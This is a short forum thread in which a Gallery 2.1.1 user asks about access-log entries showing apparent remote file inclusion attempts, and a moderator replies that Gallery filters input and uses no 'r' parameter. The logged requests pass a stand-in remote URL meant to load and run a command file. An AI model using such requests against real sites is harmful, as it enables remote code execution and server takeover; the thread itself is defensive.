Attempted hack?

sorabji Joined: 2005-12-08 Posts: 7	Posted: Fri, 2006-09-29 00:24
	My access_log is showing a rash of requests that look like this: www.infolab.cz - - [28/Sep/2006:17:43:29 -0400] "GET /r/main.php?r=http://www.badurl.com/path/to/text_file.txt HTTP/1.1" 200 4770 "-" "libwww-perl/5.803" www.infolab.cz - - [28/Sep/2006:17:44:18 -0400] "GET /r/main.php?r=http://www.badurl.com/path/to/text_file.txt HTTP/1.1" 200 4752 "-" "libwww-perl/5.803" /r/main.php is, of course, the location of my gallery main.php These requests are apparently trying to execute commands from a remote text file -- I changed the URL of that text file in these requests so as not to link anyone to the bad link. The text file contains a bunch of commands that might set up an IRC server. Running Gallery 2.1.1, should I be worried about these requests? Gallery version = 2.1.1 core 1.1.0.1 PHP version = 4.3.10 apache2handler Webserver = Apache/2.0.50 (Fedora) Database = mysql 3.23.58, lock.system=flock Operating system = Linux
	XUser login Username: * Password: * Create new account Request new password
valiant Joined: 2003-01-04 Posts: 32509	Posted: Fri, 2006-09-29 02:18
	don't worry. they may attempt to do something, but the input values for gallery are well filtered. further more, no official gallery code / module / theme looks for a "r" GET / POST variable.

XUser login